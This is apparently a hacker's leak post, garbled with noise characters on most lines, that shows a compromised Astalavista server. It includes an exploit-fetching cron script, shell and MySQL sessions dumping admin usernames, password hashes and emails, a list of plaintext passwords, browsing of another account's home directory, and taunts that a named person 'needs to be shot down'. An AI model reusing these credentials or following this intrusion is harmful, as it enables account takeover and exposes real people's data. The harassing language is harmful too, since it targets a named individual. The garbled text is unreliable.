<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate> O+ }9 [( I) K0 a& G" s8 \
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
. z: |7 o- {0 ]' Z! m9 v0 v <generator>Astalavista.com</generator>
' O& K/ q( S7 k7 T& d; f$ V. I' Y3 u <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
2 e1 X% {7 ^7 s. p0 ~ </channel>
( o8 s6 }7 B2 I+ E+ \2 |" L5 @</rss>’;
7 \- y, R+ V- Y+ i" C. ^8 Q
4 @7 J- a; m3 c4 y if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {# u2 h, z9 K. Y8 |& j$ ?
unlink (FULLPATH . ‘/feed/exploits.xml’);/ P6 @6 z+ S2 B1 E3 S' g8 O: u
}. T ?5 P5 c/ H) f
# D6 i j& ^: Z2 Z+ [! b7 f file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);6 ]! R! d$ R+ C. I) Q: Y9 I( I5 G& U
[snip]+ Y& I" U y+ f+ K9 \) \, r7 n- O
0 l. d" d r' f L* ?1 F
sh-3.2$ cat exploits.sh
( c& R3 \ Z2 S8 b( _! _#!/bin/sh
9 M8 Y* r. W2 u9 \4 E5 q
2 ?5 Z# I5 J5 [. o b###########################################################
4 S( t5 c6 K0 l8 L# #: b/ ^9 Y1 `( U3 x' G, E2 C Y
# Title: milw0rm exploits adder #: x, z8 i, z: O4 V% K
# Description: Add all milw0rm exploits to the #$ x4 ?' L, Z; _7 o& R9 }+ g% i1 c
# Astalavista.com database #
1 P9 U: C& I8 t+ N# #: [; ~" x) U( O1 u6 f7 K: s @ z2 b
# Company: Astalavista Group #
0 T1 i) q: y# P( Z# Author: Paulo M. Santos #
4 a% V( ?- J4 H$ N1 S x% {# E-Mail: 链接标记paulo.santos@astalavista.ch #' l% x& |$ _$ g, ]
# #- Q* P0 {" d4 O! F" L/ ]. i% O* o
###########################################################
+ q; E8 f9 ~# U2 D) {7 g
; d! t6 Y8 T3 J3 v# `# path
6 A: V4 [! M& Q& Q) y! Xthis_path=/home/com/public_html/modifications/cronjobs i# a5 h/ Q c v1 e- U5 x9 |
7 V( d: s3 ^6 i# s, W- P, `
# change directory$ g" r5 L) @$ A9 \: \
cd $this_path( j2 E4 r& q/ k1 S5 n7 u5 K
cd tmp/7 S$ K4 |- N0 L8 I
+ }; M+ K/ a# ~# delete files* k! }8 {, H! r, y' r
rm -rf milw0rm.tar.* &
& t8 f% E! s( E% j1 wrm -rf milw0rm/ &, U8 `4 t# I/ O' ?0 B
; R# _: D) l# \% ^
# wget milw0rm paket
7 P s4 n1 N4 _/ g. v1 x0 Hwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
8 V1 [: i. U, } L* X7 t" Z+ e4 L7 g& y* W
# extract milw0rm paket
* y8 Y! x( M! |8 \. z m4 c: @tar -xvf milw0rm.tar.bz25 T- j+ o- _# x5 I/ X
4 z# H/ S* v& m7 _& ]
# change owner
1 l9 w: m0 {1 E; i, C6 D7 y* b7 Achown -R com .
a# P" S2 Y2 } ichgrp -R com .4 f: ^/ |5 D: S/ _3 R
" r4 R$ ~: K: x% p( D7 T D+ Q# Q# execute php script
5 Z% k. a9 e6 \+ I7 ?& Ucd $this_path& U# b. p% O6 @5 x6 N$ N/ X
php -q exploits.php
0 @6 n. Z9 @6 `* F7 |5 b- s. n
# delete files; z' u0 w" p. G W- C- L
rm -rf tmp/milw0rm.tar.*4 D- v$ F) S+ L) N+ ]4 ^5 I
rm -rf tmp/milw0rm/. P, Q. V E. m6 x' F9 g
+ M5 w3 |; X; [& `) F. o' i; Fsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
! b3 E( X- D! U8 @9 n8 z" f/ KPaulo M. Santos needs to be shot down.0 c' _, Y+ g# Y( y7 S7 ~7 d
+ n" m( e w! b4 L* I5 u6 X& m
mysql -u contrexxuser2 -p
# a, Z0 i* b4 r3 u, V! SEnter password:% {( ^( B$ j6 P) ?
Welcome to the MySQL monitor. Commands end with ; or \g.) Z% }, j4 v+ F2 q0 a8 g
Your MySQL connection id is 261694
; k" }7 q! }+ f9 R' q: t4 CServer version: 5.0.45-community-log MySQL Community Edition (GPL)
# V' B: `+ f$ t5 `7 o8 Y& t7 n- y: C- N- Z; h3 M6 Y
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
. u3 y5 d* ^: _- @" \( c+ [
: a" Z+ j2 a. imysql> show databases;; P# Y6 S8 s, t. y! d
+——————–+
9 Z$ X( D; |, \9 _- _8 M| Database |* ^. Z2 ] e7 J; {5 Z1 z) K
+——————–+
2 e; a5 D$ P6 F+ b E' r. g| information_schema |" Y3 ^" G) h5 w
| com_contrexx2 |. d( _: s5 Q" _1 r/ X
| com_contrexx2_live |. S+ @% L t$ P# q
| test |/ Z6 b- n5 u$ _& R3 h( J" N6 N* x
+——————–+* k. O4 Q3 w5 o3 c# U) S
4 rows in set (0.00 sec)$ [( I5 G. a; Z9 I1 ~5 y
( ~$ p e* f! l0 Pmysql> use com_contrexx2_live
R2 F! m) m1 p% i3 R* _# ^; fDatabase changed5 Q, w- k6 k0 r. T( ?6 M3 N. J1 v6 E
mysql> show tables;$ x1 P1 }( B2 F0 }, @$ w
+————————————————–+% d$ }( N5 [0 s, s) j
| Tables_in_com_contrexx2_live |
' t* l, [5 z9 f3 i/ r$ b+————————————————–+* Z0 b# X! z& V$ ]2 |
| cc_banner_counter |/ F; z6 f1 Y# T
| cc_search_counter |
* K v- }+ m% e| contrexx_access_group_dynamic_ids |- [6 T `; s% n, D9 c* F: S
| contrexx_access_group_static_ids |" T8 }$ [# D/ y: a7 l8 O
| contrexx_access_rel_user_group |9 h7 x. W4 Z" D6 D7 s8 O4 ^
| contrexx_access_settings |
1 W) N1 t* \1 E| contrexx_access_user_attribute |6 k1 n, ]& b" l1 d/ l( R! H) H
| contrexx_access_user_attribute_name |
4 K: H' b. N+ R9 c+ X| contrexx_access_user_attribute_value |. q" g2 f2 X+ W* y
| contrexx_access_user_core_attribute |
! k- w7 E4 R, n4 h7 V| contrexx_access_user_groups |" X' k1 Q4 K$ r: ] V
| contrexx_access_user_mail |
: @2 N0 |9 _/ \2 h5 A; ^! M| contrexx_access_user_profile |6 U& I% p( J T1 c" e, ^/ z
| contrexx_access_user_title |0 O0 j& u, s) y0 _
| contrexx_access_user_validity |2 [1 S# `( o8 P3 W8 a$ w0 j3 Y
| contrexx_access_users |
" z6 }: P- ~! x& e3 J| contrexx_backend_areas |
2 }1 B3 A5 q" g$ {- Q( X2 g5 l$ Q3 I| contrexx_backups |" w9 l; v |' h! \6 Q6 h/ O
| contrexx_content |
: B$ u) R1 c# h+ a! k8 x| contrexx_content_history |
' I- ?* J: w, e# ]" @: `5 R0 m% P| contrexx_content_logfile |
. O7 s' R5 b$ {* y| contrexx_content_navigation |# [) ]& Y- ~9 {$ F8 F! ?) _
| contrexx_content_navigation_history |! s2 a8 d/ `; S
| contrexx_ids |
* Y( v( d! E# C; y) b. L| contrexx_languages |
2 [1 ?$ |( ?. h& s9 e8 ` h| contrexx_lib_country |! q& X& F" p. N
| contrexx_log |; i! g/ i* f \% |2 T
| contrexx_module_alias_source |
7 Q9 o$ [0 G2 v| contrexx_module_alias_target |
- v9 Q3 Q& }9 D9 _ N E| contrexx_module_block_blocks |
) D# ? e/ ^+ z| contrexx_module_block_rel_lang |
3 e7 E( @! S6 g8 X5 y| contrexx_module_block_rel_pages |! b& X! o- B- b) @4 _7 i
| contrexx_module_block_settings |/ S1 Z( |* S0 C" E
| contrexx_module_blog_categories |1 X# [) Y" E6 a6 ^- i+ O
| contrexx_module_blog_comments |& t% L9 U1 c: B' G e( D
| contrexx_module_blog_message_to_category |
# U L# a9 L! ?3 X/ E$ J8 t| contrexx_module_blog_messages |
% w! `% i# x9 n| contrexx_module_blog_messages_lang |9 m& ?) C% f) z! L3 f# A
| contrexx_module_blog_networks |
9 v2 n3 q+ L% [| contrexx_module_blog_networks_lang |# j0 ]+ t# L: B
| contrexx_module_blog_settings |9 q0 ~+ ]/ L6 H4 u/ `" A; z) t
| contrexx_module_blog_votes |
" T! S$ K& D( |; ?* l" X4 E+ o| contrexx_module_calendar |$ R o! ]' B$ {& J; y+ E+ i
| contrexx_module_calendar_access |
7 X: u% c9 C; e6 v| contrexx_module_calendar_categories |! @# u+ x& I& r% n; `6 i" E
| contrexx_module_calendar_form_data |
# \) | t, j# Z| contrexx_module_calendar_form_fields |
% u0 n- l( z# y" Y4 A8 Y' X; ^| contrexx_module_calendar_registrations |" C% T5 @) p7 k$ m; c$ Y
| contrexx_module_calendar_settings |
% O8 C$ R0 V$ b m8 s8 ?| contrexx_module_calendar_style |: `5 r" H! \) z2 B( Z1 e
| contrexx_module_contact_form |4 Q- S! ~' H6 e% T) k2 _& w' r
| contrexx_module_contact_form_data |
U. U7 e( s' b( F9 v! H| contrexx_module_contact_form_field |6 S2 B. E4 O; G3 @+ i) m
| contrexx_module_contact_settings |& a) d' A6 ]0 ~! q! v( D
| contrexx_module_data_categories |
% c! C' k( u8 w' x5 @' s, G| contrexx_module_data_message_to_category |. P" ]/ R- t0 I9 g: O! e3 n8 Z; \/ \
| contrexx_module_data_messages |
4 G. _/ u& \ A5 Y6 d| contrexx_module_data_messages_lang |
9 K" u" U) y! w0 \1 C7 S| contrexx_module_data_placeholders |
/ P2 U3 G- o# \; v2 Z' q9 A6 y! K| contrexx_module_data_settings |
2 I0 A" _; M8 ^: S| contrexx_module_directory_access |
* G$ {) a m% e+ J+ F% H| contrexx_module_directory_categories |: c" P$ m0 G+ J0 s( t
| contrexx_module_directory_dir |* p' B9 _: E! [4 j6 B4 ~ ?2 t
| contrexx_module_directory_inputfields |, D. U( y3 g# _1 {
| contrexx_module_directory_levels |
# n* d; g& ^2 V" h% Z) ^$ Q| contrexx_module_directory_mail |
1 O# K, P4 y# l0 L/ j, [| contrexx_module_directory_rel_dir_cat |* X; Y; Q! C( t9 A& ]
| contrexx_module_directory_rel_dir_level |
8 u7 Q9 C- X$ ~| contrexx_module_directory_settings |
. G R8 g1 M ?| contrexx_module_directory_settings_google |3 Q" k7 J1 ]9 Z9 H$ X0 Z2 Z4 N
| contrexx_module_directory_vote |
" g; i* a1 z* ~+ I& l| contrexx_module_docsys |3 [5 ~& ~0 K9 A0 E. l
| contrexx_module_docsys_categories |+ i1 N2 C3 f2 E' H3 N
| contrexx_module_egov_configuration | e, J T9 c0 F1 e% g- |
| contrexx_module_egov_orders |/ M" \' M/ J7 B' i+ o
| contrexx_module_egov_product_calendar |
( J* \$ X8 T! u) K: g8 ?" o| contrexx_module_egov_product_fields |
. q6 g2 `& f; G! e4 V) o| contrexx_module_egov_products |
. d$ E: C' e/ d1 O| contrexx_module_egov_settings |/ _# E8 G; e+ b0 H% W
| contrexx_module_exploits |
; J8 I3 y) m6 K" \| contrexx_module_exploits_categories |* E8 Y }& @% {
| contrexx_module_feed_category |8 [# A' x! M4 Z. B
| contrexx_module_feed_news |2 @9 C W- s! R& P
| contrexx_module_feed_newsml_association |
6 i3 i: S' L6 ^% x/ j( B/ ~| contrexx_module_feed_newsml_categories |2 b7 m) S* d! Q# e E) R
| contrexx_module_feed_newsml_documents |
7 ^& D$ J0 b1 R. {& Q Z: L6 a| contrexx_module_feed_newsml_providers |
. A- c% B6 p1 R8 ]% P& }. u| contrexx_module_forum_access |
- F4 |9 Q% X0 ?! }" V/ n| contrexx_module_forum_categories |
+ i" y1 u" f. O| contrexx_module_forum_categories_lang |
0 A1 X7 }" o& g& o| contrexx_module_forum_notification |
4 U, i1 W0 X! P& U$ o& f+ q$ t' T' @| contrexx_module_forum_postings |! q' ~/ b2 [ B
| contrexx_module_forum_rating |( [9 h# f/ V. o& ~* A: h
| contrexx_module_forum_settings |
; f" p J% A/ P$ U0 C$ {0 || contrexx_module_forum_statistics |2 h; \6 I8 r9 ~; ^* I5 ^4 y/ A/ j
| contrexx_module_gallery_categories |
* q$ l' |: c" b7 c7 C, ~| contrexx_module_gallery_comments | ?* Q1 n% m! T2 s0 r- g+ _
| contrexx_module_gallery_language |
& D9 D1 Y, K8 E! Q9 N5 K| contrexx_module_gallery_language_pics |: T8 d2 B9 j2 w
| contrexx_module_gallery_pictures |- e" Q8 }6 j. P2 F
| contrexx_module_gallery_settings |# r2 R) e9 q x
| contrexx_module_gallery_votes |9 u, I- Z$ t6 w
| contrexx_module_guestbook |
& v5 l. P" f1 `$ N& k1 ^. F| contrexx_module_guestbook_settings |
, S6 n! h+ Q, l* Q$ H( \& u| contrexx_module_livecam |
5 M5 D4 |1 N" l& M; ^9 I% }+ X$ X| contrexx_module_livecam_settings |
. M- X- y: q& X2 l| contrexx_module_market |
, `$ ]- }1 Z$ p% a| contrexx_module_market_access |2 `5 m1 G7 k q/ Z& D* ~( h! r
| contrexx_module_market_categories |! V$ E! Q. L% X, |: U6 N! R
| contrexx_module_market_mail |
, x" ^/ h, A- g" m/ }( ^| contrexx_module_market_paypal |9 {7 J2 Z7 G! h4 M* [8 ]2 s. ?
| contrexx_module_market_settings |
. {0 [" C1 b' s8 A. ?8 H* I' U' ]| contrexx_module_market_spez_fields |
0 v% u6 b7 R$ D1 C7 d| contrexx_module_mediadir_access |
% x3 Z3 [8 Z- \% L. I1 s| contrexx_module_mediadir_categories |6 [) S" R! N( p: P
| contrexx_module_mediadir_comments |
; p0 f$ a( o) q* ~& Z| contrexx_module_mediadir_dir |2 A( r! K) e$ T. m" K9 i& q
| contrexx_module_mediadir_inputfields |
. H0 M/ Q4 o, Q: u( V| contrexx_module_mediadir_levels |
/ m V2 F7 _$ |6 B| contrexx_module_mediadir_mail |- r1 f* k3 x$ {3 ~/ @
| contrexx_module_mediadir_rel_dir_cat |
: e) `+ a! ~8 ~( K2 z| contrexx_module_mediadir_rel_dir_level |1 S) }- Y7 G) Q" @- Y$ {
| contrexx_module_mediadir_reports |( ]5 K& P7 T: Y$ ?4 A# S- X3 e
| contrexx_module_mediadir_settings |7 b% V8 Z# L& N
| contrexx_module_mediadir_settings_google |
: E7 t; s$ J5 @" c| contrexx_module_mediadir_vote |- |1 U; g* T7 C" P# f+ @3 q0 Y
| contrexx_module_memberdir_directories |
5 w/ k$ k7 F9 H0 X g3 Y4 k5 P| contrexx_module_memberdir_name |
: u0 K' L9 j( @9 P# A4 q| contrexx_module_memberdir_settings |
9 L- l) d5 x B+ }6 E| contrexx_module_memberdir_values |# ]7 r$ a5 W7 `8 ]! f
| contrexx_module_nettools_allowed_groups |" N2 w+ o& w4 l4 ~% H3 T# n3 H' l
| contrexx_module_nettools_settings |
3 C( B& Q Y J( G6 ~' h0 N| contrexx_module_news |
8 M, {! G% U) \, G| contrexx_module_news_access |
) o4 }% w2 U9 _0 H2 C; q6 n| contrexx_module_news_categories |
3 m; ?# _6 B- p1 l9 T| contrexx_module_news_settings |
$ m* ^* E" [ G8 f7 J5 R| contrexx_module_news_teaser_frame |
) m8 H: }1 E5 T| contrexx_module_news_teaser_frame_templates |/ {6 M; D8 n( U4 J* k
| contrexx_module_news_ticker |9 X9 [& g5 [0 T/ `
| contrexx_module_newsletter |! W! p3 F' a: x& s9 I
| contrexx_module_newsletter_attachment |
# a2 y8 M# G9 N/ R| contrexx_module_newsletter_category |: A$ t1 A: l3 C
| contrexx_module_newsletter_confirm_mail |
3 _+ t9 O) A: e4 G& Y( K| contrexx_module_newsletter_rel_cat_news |2 {. S6 k( d# y$ [
| contrexx_module_newsletter_rel_user_cat |
, \' g" X% q( a6 d- l| contrexx_module_newsletter_settings |
; ` A! Y' D+ Z' M E| contrexx_module_newsletter_template |
! |6 O, x7 u1 A9 s) R* J+ O| contrexx_module_newsletter_tmp_sending |; I* }0 c7 m3 |& t8 Z
| contrexx_module_newsletter_user | r% W! I4 C; [8 H3 D, `- b( u
| contrexx_module_newsletter_user_title |
- h+ F! B- o2 V* I| contrexx_module_onlinetools_defaultports |
/ K3 V6 Q1 y0 v6 d| contrexx_module_onlinetools_defaultports_back |
+ M) v: c; l% e0 ?# Y| contrexx_module_onlinetools_geolitecity_blocks |7 n( g. V0 Y: }: p1 @& X
| contrexx_module_onlinetools_geolitecity_country |
9 ~/ p$ @5 q! g: X| contrexx_module_onlinetools_geolitecity_location |
: N3 P- v- J* U" N| contrexx_module_podcast_category |: k& Q2 i: t4 @
| contrexx_module_podcast_medium |
1 b3 h ?: `4 e0 X. J: s ]$ a| contrexx_module_podcast_rel_category_lang |. s$ o# [6 m2 i4 R# X
| contrexx_module_podcast_rel_medium_category |
2 e; i7 E, V ~' e| contrexx_module_podcast_settings |
; q4 ^' W7 P3 M5 U$ U2 y) k| contrexx_module_podcast_template |
% e, M: O m2 U4 R5 I+ D| contrexx_module_proxydb |
6 [$ f% V9 ^9 X| contrexx_module_recommend |
) L R; ~, R2 a' O! O| contrexx_module_repository |6 O9 g O& [" h$ y6 |
| contrexx_module_securitynews_cats |
1 c: {0 Y6 t& g: K| contrexx_module_securitynews_feeds |8 H& l( i$ b( N
| contrexx_module_securitynews_news |) o2 C" J, h }
| contrexx_module_shop_categories |# r3 E( R- N0 t% d2 ~' W$ P
| contrexx_module_shop_config |% Q# H! y9 D& c3 Q
| contrexx_module_shop_countries |
- `- T% X" F; U5 o! n M' s( n" k! g| contrexx_module_shop_currencies |
- c( @. k0 X9 g| contrexx_module_shop_customers |/ @+ s! h$ u% a0 M2 I
| contrexx_module_shop_importimg |' _2 [" E% e# O+ A* U
| contrexx_module_shop_lsv |
/ c# n& O! y: P2 N0 z| contrexx_module_shop_mail |
9 K3 b" T% A2 n/ r/ y0 G9 v* o| contrexx_module_shop_mail_content |
# a8 e0 R7 X$ l1 S# _( p: q3 J2 k| contrexx_module_shop_manufacturer |
# u: Z7 s1 Q0 l| contrexx_module_shop_order_items |
9 n! u1 L% _$ H% A, t( [| contrexx_module_shop_order_items_attributes |
, y7 j1 ~$ |0 b| contrexx_module_shop_orders |. M* q' B, J, V. I
| contrexx_module_shop_payment |6 R/ x4 [+ V/ Q
| contrexx_module_shop_payment_processors |9 w0 s5 M: G+ x: z: v
| contrexx_module_shop_pricelists |
3 [, R" T/ {( D: o- U| contrexx_module_shop_products |" P4 ?/ e6 E R% ^4 N
| contrexx_module_shop_products_attributes |
( O+ B7 r1 H8 Z; r% P| contrexx_module_shop_products_attributes_name |
0 a+ o. i. }0 T& Q& D2 p| contrexx_module_shop_products_attributes_value |
* ]7 g6 E0 I8 X( k6 X2 |7 Q| contrexx_module_shop_products_downloads |
9 ~! U0 d/ @$ j; g% y| contrexx_module_shop_rel_countries |
' K# e& x- ?! D# r8 ]7 O7 p3 j| contrexx_module_shop_rel_payment |
" s: `# U s) k, L' M5 s$ T# V| contrexx_module_shop_rel_shipment |' j" D3 h: \% i) a7 [/ Y
| contrexx_module_shop_shipment_cost |
! z% e% p; e! c0 N N& B! V) u| contrexx_module_shop_shipper |
7 n% W9 E4 [6 h" f| contrexx_module_shop_vat | b# W0 N2 G: s5 Q$ ~
| contrexx_module_shop_zones |" V) j* T2 S2 I
| contrexx_module_u2u_address_list |3 p: R2 Y/ w' c4 @( _
| contrexx_module_u2u_message_log |( |$ k) x0 _* \0 Y0 x
| contrexx_module_u2u_sent_messages |6 Z4 l/ t. n! R3 _/ l' c4 V/ }
| contrexx_module_u2u_settings |
! r( A1 o6 o$ S i* S7 O| contrexx_module_u2u_user_log |
+ \& w3 }- |0 R1 N( g( C| contrexx_modules |, s2 o& z% R! c" S! R+ v- _* V, n- D
| contrexx_sessions |
5 ~/ w5 w4 z: g, [4 k1 N+ Z* Z| contrexx_settings |
6 X" w: \0 Q3 P# a| contrexx_settings_smtp |
7 `! L) v5 A% L+ c' G| contrexx_skins |, {2 z" d* X% N( A7 j
| contrexx_stats_browser |
, Z' z9 ]. y4 H" \5 d6 d$ A3 u( T| contrexx_stats_colourdepth |
) k1 d- [4 t) W8 B| contrexx_stats_config |1 B+ f1 ?% K8 D# u8 ~7 Y) [
| contrexx_stats_country |
" m$ _4 h& }) I$ j$ g6 R| contrexx_stats_hostname |- C+ E0 V# w7 C. k Z% F& }; ?8 O
| contrexx_stats_javascript |
7 }* O# k! t' X" j7 l# l| contrexx_stats_operatingsystem |
: r, N& s' b) |& q0 A| contrexx_stats_referer |
/ R' t. X( k( t8 }0 R| contrexx_stats_requests |
3 }; S: K3 N$ h) L| contrexx_stats_requests_summary |4 }1 X9 X% H) d+ V. ^
| contrexx_stats_screenresolution |2 s1 L! Z ~+ m1 v- S) v: b8 y
| contrexx_stats_search |
0 n9 l9 n8 t5 k| contrexx_stats_spiders |. I0 G$ w, v& }+ n- Z
| contrexx_stats_spiders_summary |
0 \- {+ n/ r" U F| contrexx_stats_visitors |: c# {) Y/ Y! j& f
| contrexx_stats_visitors_summary |
' x, L J% G% P: q9 V2 x: _) g+ s6 W| contrexx_voting_additionaldata |1 R: o- F4 T% r9 c: l
| contrexx_voting_email |8 x4 j+ v' I' S6 G% H' H% O
| contrexx_voting_rel_email_system |& R d! j* h+ L9 d, e9 |7 g; [8 U: o
| contrexx_voting_results |
. r/ P( X! c+ A| contrexx_voting_system |2 i: T2 p+ x/ ]- M
| foo |
. q' O2 o# [6 V% z+————————————————–+9 S0 ]. Z8 S6 A% x+ F
227 rows in set (0.01 sec)
9 b1 t% G( J3 Q, ?& g C
' `9 ^7 B8 d4 U k8 l" H; Imysql> select count(*) as skids from contrexx_access_users;
6 a& u$ u ^: G+ `0 V+——-+9 v0 f- D) z# }9 ~2 _5 u- T
| skids |* R( M9 F9 Z5 Q1 M% T
+——-+' @+ H; R5 l6 O0 D
| 53699 |3 q( y( P; |: |& A% A
+——-+
0 `8 \' H+ J" L+ C1 row in set (0.00 sec)
8 m9 a0 X# b' M2 C2 N
, N1 G. l b2 D$ a9 Omysql> describe contrexx_access_users;4 P1 ?$ Y- ?& j! }
+——————+——————————————+——+—–+————–+—————-+, s- @$ L+ h# a) z' Y# b
| Field | Type | Null | Key | Default | Extra |! Y2 @% a6 K- s6 D* X
+——————+——————————————+——+—–+————–+—————-+
6 X w* g( C3 r. z r8 x2 S- _& k| id | int(10) unsigned | NO | PRI | NULL | auto_increment |: j. m: O9 i" ?8 Q B8 m6 N
| is_admin | tinyint(1) unsigned | NO | | 0 | |
9 J$ M; ~4 ^5 ^- l$ [, `% ^| username | varchar(40) | YES | MUL | NULL | |
+ |- `. ]' B: i+ Y' h4 y4 ]| password | varchar(32) | YES | | NULL | |! ~2 ]: N# K3 J2 l* v& \
| regdate | int(14) unsigned | NO | | 0 | | U( w* {% @( V0 R. F, h
| expiration | int(14) unsigned | NO | | 0 | |9 v; q" K" b; L8 d& ^/ p, x# ~3 A
| validity | int(10) unsigned | NO | | 0 | |
. u. e! `' t) d% D5 N( q, B| last_auth | int(14) unsigned | NO | | 0 | |
! r2 s8 _, b/ Y) Y1 B! q| last_activity | int(14) unsigned | NO | | 0 | |; `3 R2 \6 b( g( I/ o
| email | varchar(255) | YES | | NULL | |: R+ M% ]* t1 @5 g8 g+ @
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
2 [$ h c+ I' m3 S, |* p1 Q& {| frontend_lang_id | int(2) unsigned | NO | | 0 | |4 m% k: f9 ^3 s. p, w
| backend_lang_id | int(2) unsigned | NO | | 0 | |# ~7 V; g8 [3 _; ]4 h
| active | tinyint(1) | NO | | 0 | |
' u5 p, p D4 z9 J2 ~$ d8 S9 c0 }| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
5 {: i" |! }9 q. H| restore_key | varchar(32) | NO | | | |
" t+ J# d4 k' }& I| restore_key_time | int(14) unsigned | NO | | 0 | |
8 Q; R% M0 V9 r+ _* x; Z| u2u_active | enum(’0′,’1′) | NO | | 1 | |
; [0 o( q8 T# K2 T% |7 [6 ]7 o& H+——————+——————————————+——+—–+————–+—————-+, p3 @0 b8 T% f$ p. F6 x" o- u3 H; g9 F
18 rows in set (0.00 sec)6 w% B# I/ G% x: T( W
' Y0 { c$ y9 b* P0 W- Q
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
) k4 H B# [8 }* f0 h, g+————+———————————-+—————————–+- Q2 }+ r# |# Q2 x, A2 D
| username | password | email |
1 g5 @3 {. ~1 r: A8 `; t% k* i! U0 ]+————+———————————-+—————————–+
$ E _+ E, _1 Q, R| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
# {8 h% G1 x1 R' S2 B| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com | F4 h3 Q( s0 |0 m
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |) c- U& _$ k! f3 o( Z8 v. ?7 w
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |! ]: d- M2 e/ {/ l: n7 v
+————+———————————-+—————————–+& p0 G( |* X: q* ~2 _- f
4 rows in set (0.04 sec)
5 A( q/ C/ i4 G( J3 ?) B, y6 W" ?- L6 `5 {
mysql> exit;7 Q5 j* G$ q- u3 c6 R/ Q+ G- ~, P
Bye, Z6 o6 a P- E5 K+ ^- E
+ K4 `3 r' k2 k$ h. x( [
[~] There you go, your “team of security and IT professionals” is a joke.
% a8 B5 P& o& }3 \* Q) M. D7 Y4 Q9 X
+——————————+1 Z/ i0 C g/ X0 ^/ r8 S! K5 W
system:f82BN3+_*
2 R! d2 {( [1 ?9 y. nBe1er0ph0r:belerophor4astacom
$ Z: J! a1 X1 Zprozac:asta4cms!1 E! O2 i1 C8 M8 @" n3 {
commander:mpbdaagf6m' ?- z3 p5 s' \% p
sykadul:ak29eral# w0 k p& t H; c- `
+——————————+
4 h6 B* E. ~: v6 h. |; ]* {8 }/ C Y) R7 m
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)" ?% u& V. \5 {! k5 K Q
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.+ p; N( {. ^. f0 U* r
' J+ w3 d0 g' H8 ~4 M% B( W[~] Lets move to astalavista.net now,
/ F0 V/ g* j# F8 k8 J5 f& r" l* ^! s' |4 h5 q
From <链接标记[url]https://www.astalavista.net/[/url]>:8 S2 B, ?* y5 m+ c* O- f' o) {
>> Everyone knows that the best defense is a good offense.
( |; h6 E, P% L6 W/ D4 t& H+ q2 N, J>> Those who wait for their foes to find a security loophole are opting for the wrong strategy., ?1 Z- i0 w1 H, F7 V
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.6 e, N, Y' z+ D% q/ w
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
* L4 N8 q G6 e* k! b$ H% f, _% Q3 D
>> Go ahead, try and hack our server . in a completely legal way!8 ~% @5 K# h/ {
>> Learn by doing: We offer our members tricky tasks and challenges on an
5 u' M' p' z B3 ?' L' y1 h>> ongoing basis so you can test your knowledge and abilities. You can also, Z# ^. u" h) S( c
>> demonstrate what you.ve mastered by taking part in regular hacker contests1 L, C% C$ o4 K; r% w
>> and war games6 a: j/ `; @; X8 i2 J# a
) p# q# R* B0 O; Z1 o% e3 B, E& R
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!$ g7 \0 h! Q! H& y. ~
* {# ~. _! D/ u) A* u[-] Tricky task: Find home dir of astalavista.net& @3 m. m7 c" H8 O: M. [1 V9 S
% i( e3 z& Y0 X9 R7 H! K
sh-3.2$ ls -la ~astanet
! L W' }$ G Q# C& ]1 ]' ytotal 48& B/ e2 R, J" K4 B o. ^! x
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .) k8 k- O% `. o" c4 T
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
* y6 F( m' H' U! w6 e2 z4 t% cdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
! S$ d7 R+ H! U4 C8 B. Y$ J9 s-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history F8 Y* g/ r; z. Y2 i' F2 [
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout' Y/ r8 T# F8 o, p8 c9 N
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
7 y$ l# S+ P3 x3 p-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
4 S( I" }. G. c2 w2 adrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains2 X# y" h: J( q: D- b
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap3 W" D3 ^& y1 n
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
2 l% I+ n% ]8 ~+ a d! Nlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
+ s5 r7 u! P. y9 {-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
$ y5 P0 S/ @0 v, Q$ [3 P6 s0 O* f1 \ y, x& Y% h0 Q/ x
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
9 A& x' C: j Q3 b, q' Ash-3.2$ ls -la
+ a( Q6 a4 X, p3 P8 ^" ltotal 200
! w* P$ |. S6 p0 V; e. F* Ydrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
* K+ g* p% e ]: _9 }+ Qdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..3 z* n% v) \. f% J& Q$ }: [
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0079 \' i! i! x) ^! I: ?, Y( g
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql1 b4 \2 ^7 c8 c) _- c; P, X
